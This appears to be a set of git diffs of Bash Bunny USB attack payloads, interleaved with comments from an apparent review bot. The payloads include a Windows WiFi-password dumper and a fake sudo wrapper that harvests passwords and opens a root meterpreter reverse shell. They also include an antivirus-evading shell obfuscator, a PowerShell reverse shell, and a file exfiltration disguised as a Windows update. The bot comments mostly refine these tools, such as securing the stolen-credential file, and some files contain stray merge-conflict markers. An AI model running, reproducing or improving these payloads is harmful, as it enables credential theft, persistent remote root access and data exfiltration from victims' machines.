# Author: illwill
# Version: 0.3
#
# Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using Powershell
# then stashes them in /root/udisk/loot/WiFiCreds
#
# Blue...............Running Powershell HID Script
# Purple.............Getting WiFi Creds
# Green..............Got WiFi Creds
# Red................Didn't Get WiFi Creds
LED R 200
mkdir -p /root/udisk/loot/WiFiCreds
rm -f /root/udisk/loot/WiFiCreds/DONE
ATTACKMODE HID STORAGE
LED B 200
Q GUI
Q DELAY 500
Q STRING POWERSHELL
Q DELAY 1000
Q CTRL-SHIFT ENTER
Q DELAY 2000
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
LED R B 200
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$Bunny\\loot\\WiFiCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\WifiCreds\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 100
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/WiFiCreds/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi


@ -1,27 +0,0 @@
# WiFiCreds
* Author: illwill
* Version: Version 0.3
* Target: Windows
## Description
Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using
Powershell HID attack, then stashes them in /root/udisk/loot/WiFiCreds/
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White (blinking) | Setting up |
| Blue (blinking) | Attack running |
| Purple (blinking) | Dumping WiFi Credentials |
| Green (blinking) | Succeeded Dumping WiFi Credentials |
| Red (blinking) | Failed Dumping WiFi Credentials |
## Discussion
https://forums.hak5.org/index.php?/topic/40413-payload-wificreds/


@ -22,17 +22,15 @@
ATTACKMODE HID STORAGE
LED R B 200
LED SETUP
LANGUAGE=us
source bunny_helpers.sh
GET SWITCH_POSITION
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
LED FINISH
else
LED R
LED FAIL
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi


@ -0,0 +1,200 @@
#!/usr/bin/env python
realSudo = "/usr/bin/sudo" #"REAL_SUDO_HERE"
pythonInterpreter = "PYTHON_EXECUTABLE_GOES_HERE"
def cantLoadModuleError():
import sys
if sys.version_info.major < 3:
return ImportError
if sys.version_info.minor < 6:
return ImportError
else:
return ModuleNotFoundError
def getLootFileName():
import os
thisFullPath = os.path.abspath(__file__)
thisDirectory = os.path.split(thisFullPath)[0]
lootFile = thisDirectory + os.sep + "sudo.conf"
return os.path.join(lootFile)
def initializeThisScript():
'''This function will be run the first time by the bunny'''
import subprocess
import re
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
pythonExecutable = pathFinder.stdout.read().strip()
pathFinder = subprocess.Popen("which sudo".split(), stdout = subprocess.PIPE)
sudoExecutable = pathFinder.stdout.read().strip()
try:
import json
except cantLoadModuleError():
try:
jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
try:
import getpass
except:
try:
getPassInstaller = subprocess.Popen("pip install --user getpass".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
thisFileName = __file__
thisFile = open(thisFileName, 'r')
originalCode = thisFile.read()
thisFile.close()
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
newCode = re.sub("REAL_SUDO_HERE", sudoExecutable, newCode, 1)
thisFile = open(thisFileName, 'w')
thisFile.write(newCode)
thisFile.close()
createLootFile(getLootFileName())
silencePayloadFile()
quit()
def createLootFile(lootFileName):
import json
initialData = {}
lootFile = open(lootFileName, 'w')
json.dump(initialData, lootFile)
lootFile.close()
def validSudoPassword(password):
import subprocess
command = [realSudo, "-S", "-b", "echo", "Echo this"]
wrapper = subprocess.Popen(command, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
wrapper.communicate(password + "\n")
#wrapper.terminate()
return not wrapper.returncode
def getPayloadFile():
import os
programDirectory = os.path.split(__file__)[0]
return programDirectory + os.sep + ".sudo"
def silencePayloadFile(): #if there is an error making our reverse https, such as a bad network connection, this will make it fail without any output
import os
payloadFileName = getPayloadFile()
if os.path.isfile(payloadFileName):
payloadFile = open(payloadFileName, 'r')
payload = payloadFile.read()
payloadFile.close()
payload = "try:\n\t" + payload + "\nexcept:\n\tpass"
payloadFile = open(payloadFileName, 'w')
payloadFile.write(payload)
payloadFile.close()
def blueTurtleShell(password): #we are going to give it a password here. It won't cause a problem if it is not needed, and it might be needed if the user was doing some long process for the sudo.
import subprocess
import os
payloadFile = getPayloadFile()
if not os.path.isfile(payloadFile):
return False
command = " ".join([realSudo, "-S", "-b", pythonInterpreter, payloadFile])
hackTheGibson = subprocess.Popen(command, stdin = subprocess.PIPE, shell = True)
hackTheGibson.communicate(password + "\n")
def runIntendedSudoCommand(): #we won't need a password here, since we just got a good sudo when we verified their password
import sys
import os
args = sys.argv[1:]
for index, arg in enumerate(args):
if arg == "sudo":
args[index] = realSudo
command = " ".join([realSudo, "-S"] + args)
os.system(command) #not using subprocess. Usually the ability to mess with stdin/out/err is useful, but it just gets in the way of delivering the true user experience here. Especially if they use something interactive like vim.
def getSudoPassword(allowedAttempts = 3):
import getpass
user = getpass.getuser()
if validSudoPassword(""): #this avoids having the program ask for a password if a valid one was just entered (normal sudo behavior). Also avoids creating a bunch of reverse shells if the user is repeatedly using sudo (that could create some noise on both ends)
return (user, "", False)
prompt = "[sudo] password for %s: " %user
fail = "Sorry, try again."
epicFail = "sudo: %s incorrect password attempts" %allowedAttempts
success = False
for i in range(allowedAttempts):
password = getpass.getpass(prompt)
if validSudoPassword(password):
success = True
break
else:
if not i == allowedAttempts - 1:
print(fail)
if not success:
import sys
print(epicFail)
sys.stdout = open("/dev/null", 'w') #sometimes this generates stray outputs if there are three failed attempts. Sending them to limbo.
sys.stderr = open("/dev/null", 'w')
sys.stdout.flush()
sys.stderr.flush()
quit()
return (user, password, True)
def loadLootFile(lootFileName):
import json
try:
file = open(lootFileName, 'r')
data = json.load(file)
file.close()
return data
except:
return False
def saveLootFile(loot, lootFileName):
import json
try:
file = open(lootFileName, 'w')
json.dump(loot, file)
file.close()
except:
pass
def parseArguments():
import sys
argList = sys.argv
if "--initializeScript" in sys.argv:
initializeThisScript()
else:
return argList
def prewrap():
parseArguments()
lootFile = getLootFileName()
loot = loadLootFile(lootFile)
try:
user, password, passwordNeeded = getSudoPassword()
except:
user = None
password = None
passwordNeeded = True
if passwordNeeded and user:
loot[user] = password
if loot:
saveLootFile(loot, lootFile)
return (user, password, passwordNeeded, loot)
def postwrap(user, password, loot):
if not passwordNeeded:
if user:
try:
password = loot[user]
except:
password = ""
blueTurtleShell(password)
if __name__ == '__main__':
parseArguments()
try:
user, password, passwordNeeded, loot = prewrap()
except:
pass
runIntendedSudoCommand()
try:
postwrap(user, password, loot)
except:
pass
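Review bot: `createLootFile` and `saveLootFile` write sudo.conf with a plain `open(lootFileName, 'w')`, so the JSON file holding each user's sudo password in cleartext gets whatever mode the process umask allows. On many systems that makes it readable by every local account, which exposes the captured credentials beyond the account that ran the script. Create it owner-only in both functions, `fd = os.open(lootFileName, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)` followed by `lootFile = os.fdopen(fd, 'w')`, with `import os` added next to the existing `import json`. `getLootFileName` places the file in the script's own directory, so that path is the artefact to look for and remove when a host is cleaned up.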


@ -0,0 +1,115 @@
#!/bin/bash
# Title: Bushing's Blue Turtle
# Author: Michael Weinstein
# Target: Mac/Linux
# Version: 0.1
#
# Create a wrapper for sudo sessions that
# will live inside ~/.config/sudo and be added
# to the $PATH. After completing the sudo task
# for the user, it will attempt an encrypted reverse
# meterpreter session. The msfvenom payload
# should be in this same directory as shell.py
# Run the following command to generate a payload,
# remember to input the appropriate IP and port
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
#
# This payload was inspired greatly by SudoBackdoor
# and much of the code here was derived (or copied
# wholesale) from that with great thanks to oXis.
#
# This one's for Bushing. Probably should have written it in Perl.
#
# White | Ready
# Amber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED SETUP
#setup the attack on macos (if false, attack is for Linux)
mac=false
if [ "$mac" = true ]
then
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening (credit audibleblink)
while ! nc -z localhost 80; do sleep 0.2; done
# that was brilliant!
LED ATTACK
if [ "$mac" = true ]
then
RUN OSX terminal
else
RUN UNITY xterm
fi
QUACK DELAY 2000
if [ "$mac" = true ]
then
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo"
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo"
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
QUACK ENTER
QUACK DELAY 200
else
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo" #Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo" #Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
QUACK DELAY 200
QUACK ENTER
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
QUACK DELAY 200
QUACK ENTER
fi
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 200
if [ "$mac" = true ]
then
QUACK DELAY 5000 #seems like macs need some extra time on this
QUACK GUI w
else
QUACK STRING exit
QUACK DELAY 200
QUACK ENTER
fi
LED SUCCESS
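Review bot: The closing `LED SUCCESS` does not match the header table, which ends on `Green | Finished`, and the other payloads touched by this commit close with `LED FINISH`. `SUCCESS` is not used as an LED state anywhere else on this page, so the device may not show the green state the comment promises; use `LED FINISH` here. Separately, the rule added with `iptables -A OUTPUT -p udp --dport 53 -j DROP` and the backgrounded `python -m SimpleHTTPServer 80 &` are both still in place when the script ends. A comment saying whether that is intended would help the next reader.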


@ -0,0 +1,13 @@
#!/bin/bash
chmod u+x ~/.config/sudo/sudo
if [ -f ~/.bash_profile ]
then
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
elif if [ "$(uname -s)" == "Darwin" ]
then
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
else
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
fi
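Review bot: This script has no header comment saying what it changes on the host, and the README added in the same commit states that no cleaner has been written. It marks `~/.config/sudo/sudo` executable and appends an `export PATH=~/.config/sudo:...` line to `~/.bash_profile` or `~/.bashrc`, and both changes outlive the session. Add a comment at the top so the changes can be found and undone, for example `# Persistent changes: chmod u+x ~/.config/sudo/sudo; appends a PATH export to ~/.bash_profile or ~/.bashrc. Revert by deleting that line and ~/.config/sudo.`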


@ -0,0 +1,11 @@
#!/bin/bash
if [ ! -d ~/.config/sudo ]
then
mkdir -p ~/.config/sudo
fi
if [ -f ~/.config/ssh/sudo ]
then
rm ~/.config/ssh/sudo
fi


@ -0,0 +1,44 @@
# Bushing's Blue Turtle: The sudo subverter
* Author: Michael Weinstein (@bionomicon)
* Version: 0.1
* Target: Mac/Linux
Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference.
Current dev status: I have tested this on a linux box and been able to pwn it repeatedly. Everytime getting a root reverse shell.
## Description
Injector: Creates a folder called ~/.config/sudo where it puts a python wrapper for sudo and a meterpreter payload. Next, it copies over the python sudo wrapper and meterpreter payload. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for sudo and the path for python. The initialization function also initializes a file for saving sudo creds and slightly alters the meterpreter payload so it will fail silently if there is a bad network connection or other exception. Finally, it will set a new value in the user's PATH so that they will be running this wrapper instead of actually doing sudo. The main abnormality a user should see is a slight delay in being asked to enter their password. After this wrapper runs the desired sudo command, it will use the captured password (although probably not absolutely necessary at this stage) to have sudo run the meterpreter payload. That should open up a meterpreter session on the listening computer with root on the target. True pwnage. Every time they sudo something.
Cleaner: I will probably make a cleaner for this thing eventually for completeness sake... but really, why make a cleaner when this thing should give you multiple remote root shells?
## Configuration
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode. This payload has been tested on mac and linux. Works on both mac and linux. Mac was running sophos antivirus during the test and it blocked download of the reverse tcp shell. This can be fixed with the use of my shell smuggler (see below for details).
##Crafting a meterpreter shell payload
Payloads should be crafted in msfvenom. The meterpreter shell will be the python reverse https meterpreter payload. The payload should be stored in the folder with the rest of the files for this bash bunny payload in a file called shell.py (stored on the target system as .sudo in the directory we created). The command for generating an appropriate meterpreter shell payload is below:
```msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py```
Note that *antivirus appears to pick up this reverse tcp payload* really well. Annoying. shellSmuggler.py to the rescue! The best way to run this is to cd into the bashbunny itself and then into the payloads switch folder you are running from and run the following command (plugging in your IP address and port):
```msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw | python ShellSmuggler.py > shell.py```
## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.)
Injector
| LED | Status |
| ---------------- | -------------------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |
Cleaner (when it is made)
| LED | Status |
| ---------------- | -------------------- |
| White | Ready |
| Blue blinking | Attacking |
| Green | Finished |


@ -0,0 +1 @@
YOUR MSFVENOM REVERSE PYTHON SHELL HERE (check out the readme.md file for more instructions)


@ -0,0 +1,55 @@
#!/usr/bin/env python3
def grabEncoded(payload):
import re
regex = re.compile("sys\.version_info\[0\]\]\((\'.+\')\)")
finder = re.search(regex, payload)
encodedAttack = finder.group(1)
payload = payload.replace(encodedAttack, "encodedAttack")
return (encodedAttack, payload)
def getPayloadFromSTDIN():
import sys
payload = sys.stdin.read()
return payload
def getPayloadFromFile(fileName):
file = open(fileName, 'r')
payload = file.read()
file.close()
return payload
def breakEncoded(encodedAttack):
encoded1 = encodedAttack[::2]
encoded2 = encodedAttack[1::2]
return (encoded1, encoded2)
def makePrepend(encoded1, encoded2):
rejoiner = "encodedAttack=''.join([''.join(item) for item in zip('%s','%s')]);" %(encoded1, encoded2)
return rejoiner
def checkForInputFile():
import sys
args = sys.argv
if len(args) > 2:
raise RuntimeError("Only valid argument is a filename")
if len(args) == 2:
return args[1]
else:
return False
fileName = checkForInputFile()
if fileName:
payload = getPayloadFromFile(fileName)
else:
payload = getPayloadFromSTDIN()
if not payload:
raise RuntimeError("No payload was given")
encodedAttack, payload = grabEncoded(payload)
encodedAttack = encodedAttack.strip("'")
encoded1, encoded2 = breakEncoded(encodedAttack)
prepend = makePrepend(encoded1, encoded2)
hiddenShell = prepend + payload
import sys
sys.stdout.write(hiddenShell)


@ -0,0 +1,32 @@
# RevShellBack
- Author: NodePoint
- Version: 0.1.3
- Target: Windows
- Category: Execution
## Description
Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.
## Configuration
Place powershell and/or generic commands between lines 53 and 58 (within the EOF).
<br>
Need to run as admin? Set the variable ADMIN to true.
<br>
Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.
## STATUS
| LED | Status |
| -------- | ----------------------------------------- |
| SETUP | Setup (attackmode, variables, networking) |
| STAGE1 | Open CMD (bypass UAC if ADMIN is true) |
| STAGE2 | Initiate reverse shell |
| SPECIAL1 | Set up listener and send out commands |
| FINISH | Finished |
## Discussion
https://forums.hak5.org/topic/41955-payload-revshellback/


@ -0,0 +1,62 @@
#!/bin/bash
#
# Title: RevShellBack
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
# Author: NodePoint
# Version: 0.1.3
# Category: Execution
# Target: Windows
# Attackmodes: Ethernet, HID
# Set attack mode
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
# Set variables
GET HOST_IP
GET TARGET_HOSTNAME
# Netcat port number
NCPORT=4444
# Delay before attempting to connect to the netcat listener (ms)
NCDELAY=200
ADMIN=false
# Setup networking
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
# Open CMD
LED STAGE1
if [ "$ADMIN" = true ] ; then
# Bypass UAC
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 1500
Q ALT Y
Q DELAY 300
# Hide CMD
Q STRING "mode 18,1 & color FE & cd C:\ & title "
Q ENTER
else
# Run as normal user
RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
Q DELAY 150
fi
# Initiate reverse shell
LED STAGE2
Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
Q ENTER
# Attack -- commands go within EOF
LED SPECIAL1
nc -q 0 -l -p $NCPORT <<EOF
echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
calc;
Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
EOF
# Done
ATTACKMODE OFF
LED FINISH
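Review bot: The `# Bypass UAC` comment in the `ADMIN` branch overstates what the code does: `Start-Process cmd -verb runas` raises the ordinary elevation prompt, and the following `Q ALT Y` keystroke answers it. As far as I can tell that only succeeds when the logged-on user is an administrator in consent-prompt mode; a standard user gets a credential prompt instead, and the keystroke does nothing useful there. I would reword the comment to `# Accept the UAC consent prompt by keystroke (needs an admin session; not a bypass)`, which also tells a defender reading the payload which account configuration stops this step. The README's STAGE1 row uses the same "bypass UAC" wording.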


@ -2,21 +2,24 @@
# Author: Skiddie
# Version: 1.1
# Target: Windows
#
#
# Download and executes any binary executable with administrator privileges WITHOUT
# prompting the user for administrator rights (aka UAC bypass/exploit)
# Please define URL and SAVEFILENAME in the a.vbs script
# Please define URL and SAVEFILENAME in the a.vbs script
# Target does need internet connection
# Works on Windows 7 - Windows 10
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
#Define your bunny storage stick name
DRIVER_LABEL='BashBunny'
#RED means starting
LED R
LED SETUP
#Gets File locations
GET SWITCH_POSITION
#We are a keyboard
ATTACKMODE HID STORAGE
@ -32,4 +35,3 @@ LED G
#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
#QUACK DELAY 4500
#shutdown 0


@ -10,11 +10,15 @@
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
# ensure p.txt (your powershell payload) exists in payload directory
<<<<<<< HEAD
#
=======
#
>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 3 | Delivering powershell payload |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
@ -27,10 +31,17 @@ GET SWITCH_POSITION
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
SERVER_LOG=/tmp/server.log
<<<<<<< HEAD
# SERVER LOG
rm -f ${SERVER_LOG}
=======
# SERVER LOG
rm -f ${SERVER_LOG}
>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d
# START HTTP SERVER
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
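Review bot: Unresolved merge-conflict markers are being committed in this file: `<<<<<<< HEAD`, `=======` and `>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d` appear inside the header comment block of the first hunk and again around the `# SERVER LOG` / `rm -f ${SERVER_LOG}` step in the second. Both sides of each conflict look identical apart from whitespace, so the resolution is to keep one copy and delete the three marker lines; the markers are not comments, so the shell will try to parse them when the script runs. The later section whose hunk is headed `@ -13,6 +13,11 @@` gains a bare `=======` followed by a repeated copy of the comment lines above it, which looks like the same leftover. Running `grep -nE '^(<<<<<<<|=======|>>>>>>>)'` over the tree before committing a merge would catch these.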


@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
| Attack Stage | Description |
| ------------------- | ---------------------------------------- |
| Stage 1 | Running Initial Powershell Commands |
| Stage 3 | Delivering powershell payload |
```
| Stage 2 | Delivering powershell payload |
```


@ -13,6 +13,11 @@
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
=======
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
#
# | Attack Stage | Description |
# | ------------------- | ------------------------------|


@ -26,4 +26,4 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
| Attack Stage | Description |
| ------------------- | ------------------------------|
| Stage 1 | Powershell |
| Stage 2 | Delivering powershell payload |
| Stage 2 | Delivering powershell payload |


@ -2,7 +2,7 @@
# Author: JWHeuver & JBaselier
# Version: 1.0
#
# Runs powershell script to get Wlan and logon credentials
# Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# Purple.............Loading
@ -14,19 +14,18 @@
# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no
# Source bunny_helpers.sh to get environment variable and switch_positions
source bunny_helpers.sh
#-----------------------------------
# Purple LED - initializing
LED R B 0
LED SETUP
GET SWITCH_POSITION
# Attackmode HID / Storage
ATTACKMODE HID STORAGE
#-----------------------------------
# Green LED - executing credential_powershell
LED G 0
LED STAGE1
QUACK GUI r
QUACK DELAY 300
@ -57,4 +56,4 @@ QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED 0
LED FINISH


@ -11,49 +11,40 @@
# Purple LED..................Script Started
# Yellow LED..................Ducky Script Started
# Red LED.....................Failed to run Ducky Script, see log file
#
#
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
#
LED B R
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
# Set language
QUACK SET_LANGUAGE gb
# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
#Call ducky script
LED R G
#Call ducky script
LED STAGE1
QUACK ${SWITCH_POSITION}/ducky_script.txt
QUACK DELAY 10000
LED R G B
LED FINISH
else
LED R
LED FAIL
#Red LED if unable to load script
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1


@ -4,18 +4,18 @@
# Author: $irLurk$alot
# Version: 1.0
# Target: Windows
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn runs powershell script to copy move and extract data.
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
GET SWITCH_POSITION
LED R 100
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
LED R B 100
LED ATTACK
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED R G B
LED FINISH


@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit


@ -0,0 +1,25 @@
REM Setup required:
REM o Create SFE in the loot directory
REM o Place SmartFileExtract on the root of the bashbunny
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit


@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


@ -0,0 +1,29 @@
#!/bin/bash
#
# Title: ExecutableInstaller
# Author: IMcPwn (original)
# Additions: SaintCrossbow (only for the parts to run SFE)
# Version: 1.0
# Target: Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
QUACK DELAY 200
REM --> Minimize all windows
QUACK WINDOWS d
QUACK DELAY 200
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
QUACK ENTER
LED G
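Review bot: The header comment still describes the original ExecutableInstaller behaviour (copy `payload.exe` from the root and run it with `--startup`), but the `e.cmd` that appears to ship with this payload in the same commit runs SmartFileExtract against drive C and copies matching files into the loot folder. Anyone classifying this payload from its header would file it as an installer rather than as data exfiltration. I would change the title and the last two description lines to match, for example `# which in turn runs SmartFileExtract and copies matching files to loot\SFE on the Bash Bunny`, and add a `# Category: Exfiltration` line as the other headers in this repository do.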


@ -0,0 +1 @@
